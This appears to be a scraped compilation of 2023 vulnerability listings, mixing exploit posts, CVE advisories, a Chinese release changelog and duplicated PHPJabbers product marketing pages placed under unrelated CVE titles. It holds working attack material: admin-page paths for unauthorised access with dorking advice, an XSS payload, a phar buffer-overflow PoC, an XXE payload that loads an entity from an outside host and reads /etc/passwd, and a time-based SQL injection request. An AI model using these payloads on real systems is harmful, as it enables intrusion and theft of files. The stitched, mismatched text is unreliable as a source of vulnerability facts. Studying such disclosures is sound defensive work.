Easy Member Pro version 3.0 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Easy Member pro v3.0 Unauthorised Administrative Access Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                            || # Vendor    : https://easymemberpro30review.weebly.com/                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] allows for unauthorized administrative access , Causes partial control of the site control panel[+] use payload : 1 - /admin/memberleft.php                   2 - /admin/lefthome.php[+] http://127.0.0.1/easymemberprocom/admin/memberleft.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Easy Member Pro 3.0 Insecure Direct Object Reference

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

Posted Aug 11, 2023

Authored by indoushka

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, php, xss

SHA-256 | f72dfd55d23408ab5429974dee598db6c2f5f4c1ad279051decdd75964ab240b

Download | Favorite | View

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : DigaSell - Digital store PHP Script V1.0.0 XSS Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2                                    |  | # Dork      : "Copyright  © DigaSell All Rights Reserved."                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /browse/tags/if<script>alert(/indoushka/);</script>=2                  [+] Panel       : https://127.0.0.1/codsemcom/digasell/browse/tags/if%3Cscript%3Ealert(/indoushka/);%3C/script%3E=2Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,933)
*   Arbitrary (16,196)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,277)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,861)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,770)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,671)
*   Local (14,448)
*   Magazine (586)
*   Overflow (12,691)
*   Perl (1,423)
*   PHP (5,145)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,765)
*   Root (3,581)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,366)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,770)
*   Web (9,663)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,932)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,812)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,428)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,808)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,573)
*   Other

DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting

In PHP version 8.0.* before 8.0.30,  8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading phar file, while reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, leading potentially to memory corruption or RCE. 



**Summary**

Buffer mismanagement in phar_dir_read() causes a buffer overflow and a buffer overread later.

**Details**

https://github.com/php/php-src/blob/be71cadc2f899bc39fe27098042139392e2187db/ext/phar/dirstream.c#L89C1-L116

There are few issues here:

*   The if check to_read == 0 || count < ZSTR_LEN(str_key) is not right.  
    In particular, if this is false we know that count >= ZSTR_LEN(str_key).  
    Furthermore, because of to_read = MIN(ZSTR_LEN(str_key), count); we now actually have: to_read == ZSTR_LEN(str_key).  
    If we have a filename length (i.e. ZSTR_LEN(str_key)) equal to sizeof(php_stream_dirent), then we get ZSTR_LEN(str_key) == count == to_read == sizeof(php_stream_dirent).
    
    Take a look now at this line: ((php_stream_dirent *) buf)->d_name[to_read + 1] = '\0';.  
    Assume sizeof(php_stream_dirent) is 4096 like on most Linuxes. Then we write at offset 4097, which is two bytes outside of buf.  
    This line was actually supposed to use to_read instead of to_read + 1, because now even if it doesn't overflow, it does not properly NUL-terminate the filename. We're just lucky there's a memset above.  
    Correcting that to use to_read doesn't solve the whole problem: it would still overflow because it will write at offset 4096 which is still outside buf.
    
    This means we have a stack information leak and a buffer write overflow.
    
*   Both the memset and the return value assume that count == sizeof(php_stream_dirent).  
    In principle if there are any callers where that count is smaller, a buffer overflow occurs in the memset.  
    However, inside PHP itself I did not find any such caller, but this may be a concern for third-party extensions.
    

**PoC**

I created a reproducer using PHP-8.0 with these configure flags: ./configure --enable-debug --disable-all --enable-phar --with-valgrind using compiler gcc (GCC) 13.1.1 20230429.

Create the malicious Phar file using:

<?php
$phar = new Phar('myarchive.phar');
$phar\->startBuffering();
$phar\->addFromString(str\_repeat('A', PHP\_MAXPATHLEN - 1).'B', 'This is the content of the file.');
$phar\->stopBuffering();
?>

Trigger the buffer overflow and overread using this script:

<?php
$handle = opendir("phar://./myarchive.phar");
$x = readdir($handle);
closedir($handle);

var\_dump($x);
?>

If you run this in Valgrind, i.e. valgrind ./sapi/cli/php trigger.php you'll find two Valgrind complaints:

    ==42575== Conditional jump or move depends on uninitialised value(s)
    ==42575==    at 0x4847ED8: strlen (vg_replace_strmem.c:501)
    ==42575==    by 0x53BE9C: zif_readdir (dir.c:389)
    ==42575==    by 0x6D05C4: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:1295)
    ==42575==    by 0x742F7D: execute_ex (zend_vm_execute.h:55163)
    ==42575==    by 0x747848: zend_execute (zend_vm_execute.h:59523)
    ==42575==    by 0x696376: zend_execute_scripts (zend.c:1694)
    ==42575==    by 0x5F6D45: php_execute_script (main.c:2546)
    ==42575==    by 0x788A53: do_cli (php_cli.c:949)
    ==42575==    by 0x789ADB: main (php_cli.c:1337)
    ==42575== 
    ==42575== Syscall param write(buf) points to uninitialised byte(s)
    ==42575==    at 0x4AA2BC4: write (write.c:26)
    ==42575==    by 0x7875EA: sapi_cli_single_write (php_cli.c:261)
    ==42575==    by 0x78768D: sapi_cli_ub_write (php_cli.c:293)
    ==42575==    by 0x611034: php_output_op (output.c:1082)
    ==42575==    by 0x60F2B7: php_output_write (output.c:261)
    ==42575==    by 0x5B3B0D: php_var_dump (var.c:120)
    ==42575==    by 0x5B432A: zif_var_dump (var.c:218)
    ==42575==    by 0x6D031A: ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER (zend_vm_execute.h:1234)
    ==42575==    by 0x742F6D: execute_ex (zend_vm_execute.h:55159)
    ==42575==    by 0x747848: zend_execute (zend_vm_execute.h:59523)
    ==42575==    by 0x696376: zend_execute_scripts (zend.c:1694)
    ==42575==    by 0x5F6D45: php_execute_script (main.c:2546)
    

The first complaint is because the strlen() function overreads the d\_name buffer because it isn't properly NUL-terminated.  
The second one is because it writes the name using var\_dump, and the name contains (uninitialized) stack data.  
Valgrind won't complain about the stack buffer write overflow, but you can inspect the memory using gdb for example that a piece of the stack gets overwritten.

**Impact**

Exploiting this is difficult to do and heavily depends on the application you're targetting, but possible in theory I think using a combination of stack info leaks and buffer write overflows. People who inspect contents of untrusted phar files could be affected.

CVE-2023-3824: Buffer overflow and overread in phar_dir_read()

In PHP versions 8.0.* before 8.0.30, 8.1.* before 8.1.22, and 8.2.* before 8.2.8 various XML functions rely on libxml global state to track configuration variables, like whether external entities are loaded. This state is assumed to be unchanged unless the user explicitly changes it by calling appropriate function. However, since the state is process-global, other modules - such as ImageMagick - may also use this library within the same process, and change that global state for their internal purposes, and leave it in a state where external entities loading is enabled. This can lead to the situation where external XML is parsed with external entities loaded, which can lead to disclosure of any local files accessible to PHP. This vulnerable state may persist in the same process across many requests, until the process is shut down. 



**Summary**

After working on the issue some days, we more and more come to the assumption, that the actual issue is lower in the stack than the Nextcloud Server's PHP code. We were able to isolate it to a few lines of plain PHP code (but seemling only after performing a "Nextcloud login")

**Details**

After working on the issue some days, we more and more come to the assumption, that the actual issue is lower in the stack than the Nextcloud Server's PHP code. We were able to isolate it to a few lines of plain PHP code (but seemling only after performing a "Nextcloud login"), see POC below.

**Randomness**

The behaviour seems to depend on some "random" factors. A suggestion at the moment is that it's working on the first run in a PHP/Apache process more often then on reused.

*   We **were never able** to produce it on Nginx with PHP-FPM
*   We **were never able** to produce it on CLI
*   We **were able** to reproduce it with latest maintenance versions of PHP 8.0, 8.1 and 8.2 together with Apache2 on Debian
*   We **were unable** to reproduce it with latest maintenance versions of PHP using Apache2 on Ubuntu, but the original reporter seems to be running on Ubuntu.

We are sorry that we are unable to give a clearer indication here, but think that the issue is to critical to ignore or keep to ourselves, just because we fail to give clear reproduction systems, because to us it seems like any system consuming XML is affected.

The most reliable system to reproduce it on is our "Developer Docker": https://github.com/juliushaertl/nextcloud-docker-dev/#standalone-containers but that comes with quite some overhead. The enabled PHP modules and PHPINFO output is available here https://gist.github.com/juliushaertl/b458983b5fe87b31bd98ff2dc2468e97 On that system a Nextcloud user admin with password admin is automatically created and the attack can then be executed with a PROPFIND against the dav endpoint:

    PROPFIND /remote.php/dav/files/<username>/
    
    <?xml version="1.0"?>
    <!DOCTYPE root [<!ENTITY % remote SYSTEM "https://bin.icewind.me/r/p0gzLJ"> %remote; %intern; n%trick;]>
    <d:propfind  xmlns:d="DAV:" xmlns:oc="http://owncloud.org/ns">
      <d:prop>
        <oc:fileid />
      </d:prop>
    </d:propfind>
    

We hope that you can shed light on the situation, to help keeping the PHP world secure, by either confirm there is an issue somewhere inside PHP, libxml2, Apache2 or something else, or pointing us to something that brings clearness why it only happens sometimes.

**PoC**

<?php
$xml\= "<?xml version='1.0' encoding='utf-8' ?><!DOCTYPE root \[<!ENTITY % remote SYSTEM \\"https://bin.icewind.me/r/p0gzLJ\\"\> %remote; %intern; %trick;\]><D:propfind xmlns:D='DAV:'><D:allprop/></D:propfind>";
libxml\_use\_internal\_errors(true);
$dom = new DOMDocument();
$dom\->loadXML($xml);
echo $dom\->textContent;
foreach (libxml\_get\_errors() as $error) {
		var\_dump($error);
}

If you don't want to run code from our servers, you can replace https://bin.icewind.me/r/p0gzLJ with a link of your own, and make it serve the following content:

<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % intern "<!ENTITY &#37; trick SYSTEM 'file://WOOT%payload;WOOT'>">

The problem we are now facing is the following:

In most cases we correctly receive:

    PEReference: %intern; not found on line …, column …
    

the reporter mentioned that when this happens we should try to run it multiple times, and indeed on some systems we received a different response after some runs:

    WOOT{{base64 encoded content of /etc/passwd}}WOOT
    

**Mitigation**

Our current "fix" to the problem is to set an external entity loader (although it's disabled by default and never enabled actively on our side)

libxml\_set\_external\_entity\_loader(function () { return null; });

In most cases that leaves the response unchanged with:

    PEReference: %intern; not found on line …, column …
    

But in "successful" cases it now only responds with the following instead of the base64 encoded password file:

    Failed to load external entity "NULL" on line 0, column 0
    

Interestingly setting the entity loader to null is **not** enough and still leaves the system vulnerable:

libxml\_set\_external\_entity\_loader(null);

**Impact**

*   What: The result is a XXE with potential to escalate into a RCE
*   Who: Every application/library/server that is parsing/interacting with XML documents

CVE-2023-3823: Security issue with external entity loading in XML without enabling it

iCMS v7.0.16 was discovered to contain a SQL injection vulnerability via the where parameter at admincp.php.

\[CVE-ID\]

CVE-2023-39805

\------------------------------------------

\[Description\]

iCMS v7.0.16 was discovered to contain a SQL injection vulnerability

via the where parameter at admincp.php.

\------------------------------------------

\[Vulnerability Type\]

SQL Injection

\------------------------------------------

\[Vendor of Product\]

icmsdev

\------------------------------------------

\[Affected Product Code Base\]

icms V7.0.16 - V7.0.16

\------------------------------------------

\[Affected Component\]

icms<=V7.0.16

\------------------------------------------

\[Attack Type\]

Remote

\------------------------------------------

\[Impact Information Disclosure\]

true

\------------------------------------------

\[Attack Vectors\]

POST /icms/admincp.php?app=database&do=query&frame=iPHP&CSRF\_TOKEN=fe334f6fgxSmDHDpZeekNtohnt-hBYXBAOJkd5xXq\_XXz5vaYOwEoS\_nJrEdZo26EJVC0fA0SkLpfBFFzcE4ly18oxAoBMoCTr22qJ8 HTTP/1.1

Cookie: iCMS\_ADMIN\_AUTH=23f0a4caAp2o-gYF7T1PFGTY0fdLZd43ZdGHuQY1NnyOjOUDHZxyC\_CewgaX5uR1iNHfEz\_Pj20qTaPC\_NZlv9CKoxpPtJ80fBz7nbiMensa6tkGlbYrpw; XDEBUG\_SESSION=11807

field=tkd&pattern=123123&replacement=1231321&where=where+id=1+AND+(SELECT+\*+FROM+(SELECT(SLEEP(10)))testsql)

\------------------------------------------

\[Has vendor confirmed or acknowledged the vulnerability?\]

true

\------------------------------------------

\[Discoverer\]

chubby

\------------------------------------------

\[Reference\]

http://icms.com

http://icmsdev.com

CVE-2023-39805: CVE-2023-39805

1Panel is an open source Linux server operation and maintenance management panel. In version 1.4.3, an arbitrary file write vulnerability could lead to direct control of the server. In the `api/v1/file.go` file, there is a function called `SaveContentthat,It `recieves JSON data sent by users in the form of a POST request. And the lack of parameter filtering allows for arbitrary file write operations. Version 1.5.0 contains a patch for this issue.

**一、安装和升级****1.1 一键安装**

**CentOS/RHEL**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && sh quick\_start.sh

**Ubuntu**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && sudo bash quick\_start.sh

**Debian**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && bash quick\_start.sh

**1.2 在线升级**

登录 1Panel Web 控制台，在页面右下角点击 **【检查更新】** 进行在线升级。

> 更多信息请查阅在线文档：https://1panel.cn/docs/

**二、更新日志****2.1 新特性**

*   【网站】支持 PHP 运行环境类型网站切换版本。 by @zhengkunwang223 in #1748
*   【网站】支持网站设置重定向。 by @zhengkunwang223 in #1731
*   【数据库】支持添加 MySQL 远程数据库。 by @ssongliu in #1744
*   【主机】增加进程守护管理。 by @zhengkunwang223 in #1786

**2.2 功能优化**

*   【网站】网站设置 IPv6 功能优化。 by @zhengkunwang223 in #1732
*   【网站】网站防盗链页面样式优化。 by @zhengkunwang223 in #1807
*   【网站】网站设置页面添加反向代理时支持用户选择传输协议。 by @zhengkunwang223 in #1832
*   【网站】编辑 PHP 运行环境后增加关联应用重建的提示信息。 by @zhengkunwang223 in #1896
*   【应用商店】应用升级时增加备份选项。 by @zhengkunwang223 in #1750
*   【应用商店】已安装应用列表增加 HTTPS 类型端口的跳转功能。 by @zhengkunwang223 in #1870
*   【应用商店】全部应用和已安装应用列表页面样式优化。 by @zhengkunwang223 in #1895
*   【应用商店】应用依赖 Redis 时，创建页面自动填充 Redis 密码。 by @zhengkunwang223 in #1826
*   【数据库】数据库密码校验规则优化。 by @ssongliu in #1815
*   【数据库】数据库连接信息样式优化。 by @ssongliu in #1857
*   【容器】容器创建页面部分字段翻译优化。 by @SkyAerope in #1797
*   【主机】文件列表记录文件浏览器最后一次访问的路径。 by @zhengkunwang223 in #1753
*   【主机】文件列表页面适配移动端。 by @wangdan-fit2cloud in #1730
*   【主机】监控页面调整数据默认采集间隔和保存时间。 by @ssongliu in #1795
*   【面板设置】创建系统快照前停止所有定时任务。 by @ssongliu in #1888
*   【面板设置】服务器地址支持设置域名。 by @ssongliu in #1778
*   【面板设置】备份账号页面部分按钮样式优化。 by @ssongliu in #1893
*   【面板设置】创建快照逻辑优化。 by @ssongliu in #1805
*   【系统】登录页增加切换语言选项。 by @zhengkunwang223 in #1752
*   【系统】部分页面样式适配移动端。 by @wangdan-fit2cloud in #1891
*   【系统】移除不必要的 SSH Session 连接。 by @LeeEirc in #1780
*   【系统】部分页面分页排序样式优化。 by @ssongliu in #1821
*   【系统】创建抽屉页面不再动态显示名称。 by @ssongliu in #1777

**2.3 问题修复**

*   【网站】修复了部分场景下创建 PHP 运行环境异常的问题。 by @zhengkunwang223 in #1882
*   【应用商店】修复了应用升级后无法编辑最新配置的问题。 by @zhengkunwang223 in #1824
*   【应用商店】修复了更新应用列表后可能出现多个同名应用的问题。 by @zhengkunwang223 in #1827
*   【应用商店】修复了 Cloudreve 升级后数据丢失的问题。 by @zhengkunwang223 in #1822
*   【应用商店】修复了编辑应用时关闭高级设置之后没有提示端口放开的问题。 by @zhengkunwang223 in #1887
*   【应用商店】修复了安装应用时数据库密码包含 & $ 等特殊字符时提示错误的问题。 by @zhengkunwang223 in #1809
*   【数据库】修复了数据库日志监听未刷新的问题。 by @ssongliu in #1823
*   【容器】修复了编辑容器时不显示手动挂载的挂载卷的问题。 by @ssongliu in #1783
*   【容器】修复了编辑容器时由于端口冲突导致容器被删除的问题。 by @ssongliu in #1770
*   【主机】修复了文件压缩时无法选择文件夹的问题。 by @zhengkunwang223 in #1802
*   【主机】修复了当 SSH 登录日志涉及多个年份时导致数据异常的问题。 by @ssongliu in #1785
*   【面板设置】修复了同步快照路径错误的问题。 by @ssongliu in #1863
*   【系统】修复了系统安装在根目录时导致升级失败的问题。 by @ssongliu in #1776

**2.4 应用商店**

*   新增 JumpServer。 by @wojiushixiaobai in 1Panel-dev/appstore#238
*   新增 SFTPGo。 by @wanghe-fit2cloud in 1Panel-dev/appstore#269
*   新增 PGAdmin4。 by @wojiushixiaobai in 1Panel-dev/appstore#246
*   新增 frp。 by @okxlin in 1Panel-dev/appstore#299
*   新增 Discuz。 by @okxlin in 1Panel-dev/appstore#227
*   新增 Nextcloud。 by @okxlin in 1Panel-dev/appstore#299
*   新增 Domain Admin。 by @mouday in 1Panel-dev/appstore#278
*   新增 emlog。 by @emlog in 1Panel-dev/appstore#276
*   新增 ZFile。 by @okxlin in 1Panel-dev/appstore#299
*   新增 MeiliSearch。 by @CyJaySong in 1Panel-dev/appstore#219
*   新增 ChatGPT Web。 by @okxlin in 1Panel-dev/appstore#274
*   新增 Home Assistant。 by @okxlin in 1Panel-dev/appstore#299
*   AdGuardHome 版本升级至 v0.107.36。 by @renovate in 1Panel-dev/appstore#293
*   OpenResty 版本升级至 1.21.4.2-0。 by @wuhang2003 in 1Panel-dev/appstore#300
*   Tailchat 版本升级至 v1.8.8。 by @renovate in 1Panel-dev/appstore#305
*   青龙 版本升级至 v2.16.0。 by @renovate in 1Panel-dev/appstore#306
*   ddns-go 版本升级至 v5.6.0。 by @renovate in 1Panel-dev/appstore#307
*   Memos 版本升级至 v0.14.3。 by @renovate in 1Panel-dev/appstore#304
*   Jenkins 版本升级至 v2.418。 by @renovate in 1Panel-dev/appstore#312
*   Cloudreve 版本升级至 v3.8.2。 by @renovate in 1Panel-dev/appstore#308
*   Alist 版本升级至 v3.25.1。 by @renovate in 1Panel-dev/appstore#309

**2.5 安全更新**

*   修复了部分文件接口存在任意文件读取漏洞的问题。 (CVE-2023-39964)
*   修复了部分文件接口存在任意文件下载漏洞的问题。 (CVE-2023-39965)
*   修复了部分文件接口存在任意文件写入漏洞的问题。 (CVE-2023-39966)

CVE-2023-39966: Release v1.5.0 · 1Panel-dev/1Panel

There is a Cross Site Scripting (XSS) vulnerability in the value-enum-o_bf_include_timezone parameter of index.php in PHPJabbers Callback Widget v1.0.

Turn your website visitors into hot leads by enabling them to request a callback.

Version: 1.0

The Callback Widget is a simple PHP script that places a discreet callback button on your website. It allows your clients and website visitors to establish direct contact with your customer support or sales team and schedule a free callback at a convenient time. The callback form fields and color theme can be easily customized from the back-end Admin Panel. The callback button facilitates communication both within and outside business hours and is also an indispensable lead generation tool that will drive conversions.

**Callback Widget**

*   Highlights
*   Features
*   Demo
*   Faq
*   Pricing

**Product Highlights**

Add a Callback Widget on your website and make it easier for your potential customers to get in touch with your customer support or sales team. The request callback widget can be integrated into any website, including WordPress and Joomla sites. The front end of the PHP script consists of a callback button and an editable callback form.

Editable Callback Form

Depending on the information you need to collect from your clients, you can customize the callback request form and enable or disable fields or add required fields.

Email & SMS Notifications

You can create autoresponder messages that are sent via email or SMS both to clients and admins upon a new callback request. To enable the SMS functionality, just contact us.

Different Callback Reasons

According to their type of business, script admins can predefine different reasons for callbacks that will appear in the request callback form. These can be edited and enabled or disabled at any time.

Mobile-Friendly & Modern Design

The Callback Widget's front end can be loaded across various devices and screen sizes. The callback form is available in 10 different color variations designed to best match your website branding.

Automatic Time Conversion

In order to prevent potential time difference mix-ups, the best time to call and the timezone specified by customers is automatically converted to the default time set in the back-end system.

Export Callback Requests

Generate CSV and XML files for the callback requests in any selected period. You can also import iCal to Google Calendar. Password-protect your data so only authorized people have access.

Multi-Language Support

Translate all titles and alerts in the front end and back end to any language you need. Search for specific text parts and use the unique text IDs to add the translations in a new language.

PHP Source Code Customization

Buy the Callback Widget with a Developer License and make your own modifications to the source code. We can also customize the callback form for you upon request. Compare licenses  

SPECIAL OFFER

**Callback Widget for $4.29 Only**

Get all 65 PHPJabbers scripts in a bundle for just $299.

**Live Demo**

Preview both the front end and back end of the Callback Widget and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Callback Widget**

**Key Benefits**

Extended Licence

High Performance

Remote Hosting

Customizations

Key Features

**Pricing**

You can buy the Callback Widget both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

$4.29

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

$4.29 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

$299

VIEW DETAILS

**Testimonials**

Let our clients share their experience with our callback button and how the widget has improved their online business.

“

I am very impressed with the scripts you provide, and for non-highly technical users like me, your PHP scripts are so easy to use. Plus, you just saved me money and time for installing the scripts for me. Your customer service is unbeatable.

Jennifer Solis

“

You guys are great! Your PHP scripts helped me to upgrade my websites. Your after-sales help is the best I have ever had. I can't thank you enough. Anyone who doesn't give PHPJabbers a try will be missing out! Thanks again! I'll be back for more! And I mean it too!  
Grace and Peace

Eric Mapp

“

What a great service. I'm telling everyone about how good you guys are. I will always look to your site for scripts before anywhere else.

Cameron Forster

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Callback Widget.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

FTP Clients

See how to upload our scripts using different FTP clients.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Ticket Support Script**

$19 / $29

**PHP Contact Form Generator**

$19 / $29

**Member Directory Script**

$39 / $79

**Appointment Scheduler**

$69 / $129

**Make An Offer Widget**

$19 / $29

**PHP Review Script**

$39 / $79

CVE-2023-36312: Callback Widget | Callback Button

There is a Cross Site Scripting (XSS) vulnerability in the "action" parameter of index.php in PHPJabbers Callback Widget v1.0.

Turn your website visitors into hot leads by enabling them to request a callback.

Version: 1.0

The Callback Widget is a simple PHP script that places a discreet callback button on your website. It allows your clients and website visitors to establish direct contact with your customer support or sales team and schedule a free callback at a convenient time. The callback form fields and color theme can be easily customized from the back-end Admin Panel. The callback button facilitates communication both within and outside business hours and is also an indispensable lead generation tool that will drive conversions.

**Callback Widget**

*   Highlights
*   Features
*   Demo
*   Faq
*   Pricing

**Product Highlights**

Add a Callback Widget on your website and make it easier for your potential customers to get in touch with your customer support or sales team. The request callback widget can be integrated into any website, including WordPress and Joomla sites. The front end of the PHP script consists of a callback button and an editable callback form.

Editable Callback Form

Depending on the information you need to collect from your clients, you can customize the callback request form and enable or disable fields or add required fields.

Email & SMS Notifications

You can create autoresponder messages that are sent via email or SMS both to clients and admins upon a new callback request. To enable the SMS functionality, just contact us.

Different Callback Reasons

According to their type of business, script admins can predefine different reasons for callbacks that will appear in the request callback form. These can be edited and enabled or disabled at any time.

Mobile-Friendly & Modern Design

The Callback Widget's front end can be loaded across various devices and screen sizes. The callback form is available in 10 different color variations designed to best match your website branding.

Automatic Time Conversion

In order to prevent potential time difference mix-ups, the best time to call and the timezone specified by customers is automatically converted to the default time set in the back-end system.

Export Callback Requests

Generate CSV and XML files for the callback requests in any selected period. You can also import iCal to Google Calendar. Password-protect your data so only authorized people have access.

Multi-Language Support

Translate all titles and alerts in the front end and back end to any language you need. Search for specific text parts and use the unique text IDs to add the translations in a new language.

PHP Source Code Customization

Buy the Callback Widget with a Developer License and make your own modifications to the source code. We can also customize the callback form for you upon request. Compare licenses  

SPECIAL OFFER

**Callback Widget for $4.29 Only**

Get all 65 PHPJabbers scripts in a bundle for just $299.

**Live Demo**

Preview both the front end and back end of the Callback Widget and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Callback Widget**

**Key Benefits**

Key Features

One admiN

Extended Licence

Installation Support

Payment Gateways

**Pricing**

You can buy the Callback Widget both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

$4.29

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

$4.29 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

$299

VIEW DETAILS

**Testimonials**

Let our clients share their experience with our callback button and how the widget has improved their online business.

“

I am very impressed with the scripts you provide, and for non-highly technical users like me, your PHP scripts are so easy to use. Plus, you just saved me money and time for installing the scripts for me. Your customer service is unbeatable.

Jennifer Solis

“

You guys are great! Your PHP scripts helped me to upgrade my websites. Your after-sales help is the best I have ever had. I can't thank you enough. Anyone who doesn't give PHPJabbers a try will be missing out! Thanks again! I'll be back for more! And I mean it too!  
Grace and Peace

Eric Mapp

“

What a great service. I'm telling everyone about how good you guys are. I will always look to your site for scripts before anywhere else.

Cameron Forster

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Callback Widget.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

FTP Clients

See how to upload our scripts using different FTP clients.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Ticket Support Script**

$19 / $29

**PHP Contact Form Generator**

$19 / $29

**Member Directory Script**

$39 / $79

**Appointment Scheduler**

$69 / $129

**Make An Offer Widget**

$19 / $29

**PHP Review Script**

$39 / $79

CVE-2023-36315: Callback Widget | Callback Button

PHPJabbers Document Creator v1.0 is vulnerable to Cross Site Scripting (XSS) via all post parameters of "Export Requests" aside from "request_feed".

CVE-2023-36313

A File Upload vulnerability in PHPJabbers Ticket Support Script v3.2 allows attackers to execute arbitrary code via uploading a crafted file.

Embed an efficient and reliable help desk system into your website!

Version: 3.2

An affordable online help desk system that enables you to manage and consolidate all customer support requests at one online centralized location. Simple installation, one-time payment, fully customizable – an easy-to-use support ticket system. Our Ticket Support Script will not only provide you with an online help desk but it will empower you to manage and keep tickets in check. Take a closer look and contact us, if you have any questions or want to request a modification!

**Ticket Support Script**

*   Highlights
*   Features
*   Demo
*   Faq
*   Pricing

**Product Highlights**

